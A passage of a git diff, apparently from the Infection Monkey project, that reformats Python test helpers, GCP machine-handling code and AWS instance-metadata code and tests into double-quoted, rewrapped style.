+44,61 @@ class SampleMultiplier: for monkey in monkeys: if monkey.on_island: continue - if (monkey.original_guid in telem['content'] or monkey.original_guid in telem['endpoint']) \ - and not monkey.on_island: - telem['content'] = telem['content'].replace(monkey.original_guid, monkey.fake_guid) - telem['endpoint'] = telem['endpoint'].replace(monkey.original_guid, monkey.fake_guid) + if ( + monkey.original_guid in telem["content"] + or monkey.original_guid in telem["endpoint"] + ) and not monkey.on_island: + telem["content"] = telem["content"].replace( + monkey.original_guid, monkey.fake_guid + ) + telem["endpoint"] = telem["endpoint"].replace( + monkey.original_guid, monkey.fake_guid + ) for i in range(len(monkey.original_ips)): - telem['content'] = telem['content'].replace(monkey.original_ips[i], monkey.fake_ips[i]) + telem["content"] = telem["content"].replace( + monkey.original_ips[i], monkey.fake_ips[i] + ) @staticmethod def offset_telem_times(iteration: int, telems: List[Dict]): for telem in telems: - telem['time']['$date'] += iteration * 1000 + telem["time"]["$date"] += iteration * 1000 def get_monkeys_from_telems(self, telems: List[Dict]): island_ips = SampleMultiplier.get_island_ips_from_telems(telems) monkeys = [] - for telem in [telem for telem in telems - if 'telem_category' in telem and telem['telem_category'] == 'system_info']: - if 'network_info' not in telem['data']: + for telem in [ + telem + for telem in telems + if "telem_category" in telem and telem["telem_category"] == "system_info" + ]: + if "network_info" not in telem["data"]: continue - guid = telem['monkey_guid'] + guid = telem["monkey_guid"] monkey_present = [monkey for monkey in monkeys if monkey.original_guid == guid] if not monkey_present: - ips = [net_info['addr'] for net_info in telem['data']['network_info']['networks']] + ips = [net_info["addr"] for net_info in telem["data"]["network_info"]["networks"]] if set(island_ips).intersection(ips): on_island = True else: on_island = False - monkeys.append(FakeMonkey(ips=ips, - guid=guid, - fake_ip_generator=self.fake_ip_generator, - on_island=on_island)) + monkeys.append( + FakeMonkey( + ips=ips, + guid=guid, + fake_ip_generator=self.fake_ip_generator, + on_island=on_island, + ) + ) return monkeys @staticmethod def get_island_ips_from_telems(telems: List[Dict]) -> List[str]: island_ips = [] for telem in telems: - if 'config' in telem: - island_ips = telem['config']['command_servers'] + if "config" in telem: + island_ips = telem["config"]["command_servers"] for i in range(len(island_ips)): island_ips[i] = island_ips[i].replace(":5000", "") return island_ips diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py index 02cf3a8eb..7a4f30cff 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/test_fake_ip_generator.py @@ -1,19 +1,21 @@ from unittest import TestCase -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \ - FakeIpGenerator +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import ( + FakeIpGenerator, +) class TestFakeIpGenerator(TestCase): - def test_fake_ip_generation(self): fake_ip_gen = FakeIpGenerator() self.assertListEqual([1, 1, 1, 1], fake_ip_gen.fake_ip_parts) for i in range(256): - fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']) - self.assertListEqual(['1.1.2.1'], fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])) + fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"]) + self.assertListEqual(["1.1.2.1"], fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"])) fake_ip_gen.fake_ip_parts = [256, 256, 255, 256] - self.assertListEqual(['256.256.255.256', '256.256.256.1'], - fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1', '1.1.1.2'])) + self.assertListEqual( + ["256.256.255.256", "256.256.256.1"], + fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1", "1.1.1.2"]), + ) fake_ip_gen.fake_ip_parts = [256, 256, 256, 256] - self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])) + self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"])) diff --git a/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test.py b/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test.py index 699876cce..b76c1b68d 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test.py @@ -8,7 +8,9 @@ from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceA from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import ( + SampleFileParser, +) LOGGER = logging.getLogger(__name__) @@ -17,7 +19,6 @@ MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=60) class TelemetryPerformanceTest: - def __init__(self, island_client: MonkeyIslandClient, quick_performance_test: bool): self.island_client = island_client self.quick_performance_test = quick_performance_test @@ -27,29 +28,40 @@ class TelemetryPerformanceTest: try: all_telemetries = SampleFileParser.get_all_telemetries() except FileNotFoundError: - raise FileNotFoundError("Telemetries to send not found. " - "Refer to readme to figure out how to generate telemetries and where to put them.") + raise FileNotFoundError( + "Telemetries to send not found. " + "Refer to readme to figure out how to generate telemetries and where to put them." + ) LOGGER.info("Telemetries imported successfully.") - all_telemetries.sort(key=lambda telem: telem['time']['$date']) + all_telemetries.sort(key=lambda telem: telem["time"]["$date"]) telemetry_parse_times = {} - for telemetry in tqdm(all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"): + for telemetry in tqdm( + all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent" + ): telemetry_endpoint = TelemetryPerformanceTest.get_verbose_telemetry_endpoint(telemetry) telemetry_parse_times[telemetry_endpoint] = self.get_telemetry_time(telemetry) - test_config = PerformanceTestConfig(MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME) + test_config = PerformanceTestConfig( + MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME + ) PerformanceAnalyzer(test_config, telemetry_parse_times).analyze_test_results() if not self.quick_performance_test: self.island_client.reset_env() def get_telemetry_time(self, telemetry): - content = telemetry['content'] - url = telemetry['endpoint'] - method = SupportedRequestMethod.__getattr__(telemetry['method']) + content = telemetry["content"] + url = telemetry["endpoint"] + method = SupportedRequestMethod.__getattr__(telemetry["method"]) return self.island_client.requests.get_request_time(url=url, method=method, data=content) @staticmethod def get_verbose_telemetry_endpoint(telemetry): telem_category = "" - if "telem_category" in telemetry['content']: - telem_category = "_" + json.loads(telemetry['content'])['telem_category'] + "_" + telemetry['_id']['$oid'] - return telemetry['endpoint'] + telem_category + if "telem_category" in telemetry["content"]: + telem_category = ( + "_" + + json.loads(telemetry["content"])["telem_category"] + + "_" + + telemetry["_id"]["$oid"] + ) + return telemetry["endpoint"] + telem_category diff --git a/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test_workflow.py b/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test_workflow.py index 6d09752ca..b492bf9e6 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test_workflow.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telemetry_performance_test_workflow.py @@ -1,12 +1,17 @@ from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest -from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest +from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import ( + EndpointPerformanceTest, +) from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest +from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import ( + TelemetryPerformanceTest, +) class TelemetryPerformanceTestWorkflow(BasicTest): - - def __init__(self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test): + def __init__( + self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test + ): self.name = name self.island_client = island_client self.performance_config = performance_config @@ -15,10 +20,14 @@ class TelemetryPerformanceTestWorkflow(BasicTest): def run(self): try: if not self.quick_performance_test: - telem_sending_test = TelemetryPerformanceTest(island_client=self.island_client, - quick_performance_test=self.quick_performance_test) + telem_sending_test = TelemetryPerformanceTest( + island_client=self.island_client, + quick_performance_test=self.quick_performance_test, + ) telem_sending_test.test_telemetry_performance() - performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client) + performance_test = EndpointPerformanceTest( + self.name, self.performance_config, self.island_client + ) assert performance_test.run() finally: if not self.quick_performance_test: diff --git a/envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py b/envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py index 927b5b6f3..00279ea8b 100644 --- a/envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py +++ b/envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py @@ -11,14 +11,21 @@ class GCPHandler(object): MACHINE_STARTING_COMMAND = "gcloud compute instances start %s --zone=%s" MACHINE_STOPPING_COMMAND = "gcloud compute instances stop %s --zone=%s" - def __init__(self, key_path="../gcp_keys/gcp_key.json", zone="europe-west3-a", project_id="guardicore-22050661"): + def __init__( + self, + key_path="../gcp_keys/gcp_key.json", + zone="europe-west3-a", + project_id="guardicore-22050661", + ): self.zone = zone try: # pass the key file to gcp subprocess.call(GCPHandler.get_auth_command(key_path), shell=True) # noqa: DUO116 LOGGER.info("GCP Handler passed key") # set project - subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True) # noqa: DUO116 + subprocess.call( + GCPHandler.get_set_project_command(project_id), shell=True + ) # noqa: DUO116 LOGGER.info("GCP Handler set project") LOGGER.info("GCP Handler initialized successfully") except Exception as e: @@ -32,14 +39,18 @@ class GCPHandler(object): """ LOGGER.info("Setting up all GCP machines...") try: - subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116 + subprocess.call( + (GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True + ) # noqa: DUO116 LOGGER.info("GCP machines successfully started.") except Exception as e: LOGGER.error("GCP Handler failed to start GCP machines: %s" % e) def stop_machines(self, machine_list): try: - subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116 + subprocess.call( + (GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True + ) # noqa: DUO116 LOGGER.info("GCP machines stopped successfully.") except Exception as e: LOGGER.error("GCP Handler failed to stop network machines: %s" % e) diff --git a/envs/os_compatibility/conftest.py b/envs/os_compatibility/conftest.py index 13aabf5b6..eb643c028 100644 --- a/envs/os_compatibility/conftest.py +++ b/envs/os_compatibility/conftest.py @@ -2,10 +2,14 @@ import pytest def pytest_addoption(parser): - parser.addoption("--island", action="store", default="", - help="Specify the Monkey Island address (host+port).") + parser.addoption( + "--island", + action="store", + default="", + help="Specify the Monkey Island address (host+port).", + ) -@pytest.fixture(scope='module') +@pytest.fixture(scope="module") def island(request): return request.config.getoption("--island") diff --git a/envs/os_compatibility/test_compatibility.py b/envs/os_compatibility/test_compatibility.py index 1cf5220bb..f43323e19 100644 --- a/envs/os_compatibility/test_compatibility.py +++ b/envs/os_compatibility/test_compatibility.py @@ -31,22 +31,21 @@ machine_list = { } -@pytest.fixture(scope='class') +@pytest.fixture(scope="class") def island_client(island): island_client_object = MonkeyIslandClient(island) yield island_client_object -@pytest.mark.usefixtures('island_client') +@pytest.mark.usefixtures("island_client") # noinspection PyUnresolvedReferences class TestOSCompatibility(object): - def test_os_compat(self, island_client): print() all_monkeys = island_client.get_all_monkeys_from_db() ips_that_communicated = [] for monkey in all_monkeys: - for ip in monkey['ip_addresses']: + for ip in monkey["ip_addresses"]: if ip in machine_list: ips_that_communicated.append(ip) break diff --git a/monkey/__init__.py b/monkey/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/__init__.py +++ b/monkey/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/common/__init__.py b/monkey/common/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/common/__init__.py +++ b/monkey/common/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/common/cloud/__init__.py b/monkey/common/cloud/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/common/cloud/__init__.py +++ b/monkey/common/cloud/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/common/cloud/aws/aws_instance.py b/monkey/common/cloud/aws/aws_instance.py index 75dee4ce9..5cdf3bdd3 100644 --- a/monkey/common/cloud/aws/aws_instance.py +++ b/monkey/common/cloud/aws/aws_instance.py @@ -6,11 +6,11 @@ import requests from common.cloud.environment_names import Environment from common.cloud.instance import CloudInstance -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254" -AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) +AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS) ACCOUNT_ID_KEY = "accountId" logger = logging.getLogger(__name__) @@ -20,6 +20,7 @@ class AwsInstance(CloudInstance): """ Class which gives useful information about the current instance you're on. """ + def is_instance(self): return self.instance_id is not None @@ -32,25 +33,35 @@ class AwsInstance(CloudInstance): self.account_id = None try: - response = requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2) + response = requests.get( + AWS_LATEST_METADATA_URI_PREFIX + "meta-data/instance-id", timeout=2 + ) self.instance_id = response.text if response else None self.region = self._parse_region( - requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').text) + requests.get( + AWS_LATEST_METADATA_URI_PREFIX + "meta-data/placement/availability-zone" + ).text + ) except (requests.RequestException, IOError) as e: logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e)) try: self.account_id = self._extract_account_id( - requests.get(AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).text) + requests.get( + AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2 + ).text + ) except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e: - logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e)) + logger.debug( + "Failed init of AwsInstance while getting dynamic instance data: {}".format(e) + ) @staticmethod def _parse_region(region_url_response): # For a list of regions, see: # https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html # This regex will find any AWS region format string in the response. - re_phrase = r'((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])' + re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])" finding = re.findall(re_phrase, region_url_response, re.IGNORECASE) if finding: return finding[0] diff --git a/monkey/common/cloud/aws/aws_service.py b/monkey/common/cloud/aws/aws_service.py index a42c2e1dd..0825811a9 100644 --- a/monkey/common/cloud/aws/aws_service.py +++ b/monkey/common/cloud/aws/aws_service.py @@ -6,24 +6,27 @@ from botocore.exceptions import ClientError from common.cloud.aws.aws_instance import AwsInstance -__author__ = ['itay.mizeretz', 'shay.nehmad'] +__author__ = ["itay.mizeretz", "shay.nehmad"] -INSTANCE_INFORMATION_LIST_KEY = 'InstanceInformationList' -INSTANCE_ID_KEY = 'InstanceId' -COMPUTER_NAME_KEY = 'ComputerName' -PLATFORM_TYPE_KEY = 'PlatformType' -IP_ADDRESS_KEY = 'IPAddress' +INSTANCE_INFORMATION_LIST_KEY = "InstanceInformationList" +INSTANCE_ID_KEY = "InstanceId" +COMPUTER_NAME_KEY = "ComputerName" +PLATFORM_TYPE_KEY = "PlatformType" +IP_ADDRESS_KEY = "IPAddress" logger = logging.getLogger(__name__) def filter_instance_data_from_aws_response(response): - return [{ - 'instance_id': x[INSTANCE_ID_KEY], - 'name': x[COMPUTER_NAME_KEY], - 'os': x[PLATFORM_TYPE_KEY].lower(), - 'ip_address': x[IP_ADDRESS_KEY] - } for x in response[INSTANCE_INFORMATION_LIST_KEY]] + return [ + { + "instance_id": x[INSTANCE_ID_KEY], + "name": x[COMPUTER_NAME_KEY], + "os": x[PLATFORM_TYPE_KEY].lower(), + "ip_address": x[IP_ADDRESS_KEY], + } + for x in response[INSTANCE_INFORMATION_LIST_KEY] + ] class AwsService(object): @@ -45,8 +48,8 @@ class AwsService(object): @staticmethod def get_client(client_type, region=None): return boto3.client( - client_type, - region_name=region if region is not None else AwsService.region) + client_type, region_name=region if region is not None else AwsService.region + ) @staticmethod def get_session(): @@ -54,12 +57,12 @@ class AwsService(object): @staticmethod def get_regions(): - return AwsService.get_session().get_available_regions('ssm') + return AwsService.get_session().get_available_regions("ssm") @staticmethod def test_client(): try: - AwsService.get_client('ssm').describe_instance_information() + AwsService.get_client("ssm").describe_instance_information() return True except ClientError: return False diff --git a/monkey/common/cloud/aws/test_aws_instance.py b/monkey/common/cloud/aws/test_aws_instance.py index 30f0c9d86..146326518 100644 --- a/monkey/common/cloud/aws/test_aws_instance.py +++ b/monkey/common/cloud/aws/test_aws_instance.py @@ -2,14 +2,13 @@ import pytest import requests import requests_mock -from common.cloud.aws.aws_instance import (AWS_LATEST_METADATA_URI_PREFIX, - AwsInstance) +from common.cloud.aws.aws_instance import AWS_LATEST_METADATA_URI_PREFIX, AwsInstance from common.cloud.environment_names import Environment -INSTANCE_ID_RESPONSE = 'i-1234567890abcdef0' +INSTANCE_ID_RESPONSE = "i-1234567890abcdef0" -AVAILABILITY_ZONE_RESPONSE = 'us-west-2b' +AVAILABILITY_ZONE_RESPONSE = "us-west-2b" # from https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """ @@ -33,34 +32,33 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """ """ -EXPECTED_INSTANCE_ID = 'i-1234567890abcdef0' +EXPECTED_INSTANCE_ID = "i-1234567890abcdef0" -EXPECTED_REGION = 'us-west-2' +EXPECTED_REGION = "us-west-2" -EXPECTED_ACCOUNT_ID = '123456789012' +EXPECTED_ACCOUNT_ID = "123456789012" -def get_test_aws_instance(text={'instance_id': None, - 'region': None, - 'account_id': None}, - exception={'instance_id': None, - 'region': None, - 'account_id': None}): +def get_test_aws_instance( + text={"instance_id": None, "region": None, "account_id": None}, + exception={"instance_id": None, "region": None, "account_id": None}, +): with requests_mock.Mocker() as m: # request made to get instance_id - url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id' - m.get(url, text=text['instance_id']) if text['instance_id'] else m.get( - url, exc=exception['instance_id']) + url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id" + m.get(url, text=text["instance_id"]) if text["instance_id"] else m.get( + url, exc=exception["instance_id"] + ) # request made to get region - url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone' - m.get(url, text=text['region']) if text['region'] else m.get( - url, exc=exception['region']) + url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone" + m.get(url, text=text["region"]) if text["region"] else m.get(url, exc=exception["region"]) # request made to get account_id - url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document' - m.get(url, text=text['account_id']) if text['account_id'] else m.get( - url, exc=exception['account_id']) + url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document" + m.get(url, text=text["account_id"]) if text["account_id"] else m.get( + url, exc=exception["account_id"] + ) test_aws_instance_object = AwsInstance() return test_aws_instance_object @@ -69,9 +67,13 @@ def get_test_aws_instance(text={'instance_id': None, # all good data @pytest.fixture def good_data_mock_instance(): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': AVAILABILITY_ZONE_RESPONSE, - 'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": AVAILABILITY_ZONE_RESPONSE, + "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE, + } + ) def test_is_instance_good_data(good_data_mock_instance): @@ -97,9 +99,13 @@ def test_get_account_id_good_data(good_data_mock_instance): # 'region' bad data @pytest.fixture def bad_region_data_mock_instance(): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': 'in-a-different-world', - 'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": "in-a-different-world", + "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE, + } + ) def test_is_instance_bad_region_data(bad_region_data_mock_instance): @@ -125,9 +131,13 @@ def test_get_account_id_bad_region_data(bad_region_data_mock_instance): # 'account_id' bad data @pytest.fixture def bad_account_id_data_mock_instance(): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': AVAILABILITY_ZONE_RESPONSE, - 'account_id': 'who-am-i'}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": AVAILABILITY_ZONE_RESPONSE, + "account_id": "who-am-i", + } + ) def test_is_instance_bad_account_id_data(bad_account_id_data_mock_instance): @@ -153,35 +163,37 @@ def test_get_account_id_data_bad_account_id_data(bad_account_id_data_mock_instan # 'instance_id' bad requests @pytest.fixture def bad_instance_id_request_mock_instance(instance_id_exception): - return get_test_aws_instance(text={'instance_id': None, - 'region': AVAILABILITY_ZONE_RESPONSE, - 'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE}, - exception={'instance_id': instance_id_exception, - 'region': None, - 'account_id': None}) + return get_test_aws_instance( + text={ + "instance_id": None, + "region": AVAILABILITY_ZONE_RESPONSE, + "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE, + }, + exception={"instance_id": instance_id_exception, "region": None, "account_id": None}, + ) -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_is_instance_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.is_instance() is False -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_get_cloud_provider_name_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_get_instance_id_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.get_instance_id() is None -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_get_region_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.get_region() is None -@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError]) def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_instance): assert bad_instance_id_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID @@ -189,35 +201,37 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins # 'region' bad requests @pytest.fixture def bad_region_request_mock_instance(region_exception): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': None, - 'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE}, - exception={'instance_id': None, - 'region': region_exception, - 'account_id': None}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": None, + "account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE, + }, + exception={"instance_id": None, "region": region_exception, "account_id": None}, + ) -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_is_instance_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.is_instance() -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_get_cloud_provider_name_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.get_cloud_provider_name() == Environment.AWS -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_get_instance_id_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_get_region_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.get_region() is None -@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError]) def test_get_account_id_bad_region_request(bad_region_request_mock_instance): assert bad_region_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID @@ -225,35 +239,37 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance): # 'account_id' bad requests @pytest.fixture def bad_account_id_request_mock_instance(account_id_exception): - return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE, - 'region': AVAILABILITY_ZONE_RESPONSE, - 'account_id': None}, - exception={'instance_id': None, - 'region': None, - 'account_id': account_id_exception}) + return get_test_aws_instance( + text={ + "instance_id": INSTANCE_ID_RESPONSE, + "region": AVAILABILITY_ZONE_RESPONSE, + "account_id": None, + }, + exception={"instance_id": None, "region": None, "account_id": account_id_exception}, + ) -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_is_instance_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.is_instance() -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_get_cloud_provider_name_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_get_instance_id_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_get_region_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.get_region() == EXPECTED_REGION -@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError]) +@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError]) def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_instance): assert bad_account_id_request_mock_instance.get_account_id() is None @@ -263,15 +279,15 @@ def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_insta def not_found_request_mock_instance(): with requests_mock.Mocker() as m: # request made to get instance_id - url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id' + url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id" m.get(url, status_code=404) # request made to get region - url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone' + url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone" m.get(url) # request made to get account_id - url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document' + url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document" m.get(url) not_found_aws_instance_object = AwsInstance() diff --git a/monkey/common/cloud/aws/test_aws_service.py b/monkey/common/cloud/aws/test_aws_service.py index 9e3f342b2..8b17d707d 100644 --- a/monkey/common/cloud/aws/test_aws_service.py +++ b/monkey/common/cloud/aws/test_aws_service.py @@ -3,7 +3,7 @@ from unittest import TestCase from .aws_service import filter_instance_data_from_aws_response -__author__ = 'shay.nehmad' +__author__ = "shay.nehmad" class TestFilterInstanceDataFromAwsResponse(TestCase): @@ -49,10 +49,10 @@ class TestFilterInstanceDataFromAwsResponse(TestCase): } """ - self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), []) + self.assertEqual( + filter_instance_data_from_aws_response(json.loads(json_response_empty)), [] + ) self.assertEqual( filter_instance_data_from_aws_response(json.loads(json_response_full)), - [{'instance_id': 'string', - 'ip_address': 'string', - 'name': 'string', - 'os': 'string'}]) + [{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}], + ) diff --git a/monkey/common/cloud/azure/azure_instance.py b/monkey/common/cloud/azure/azure_instance.py index 969e4a8ca..186ce3c9d 100644 --- 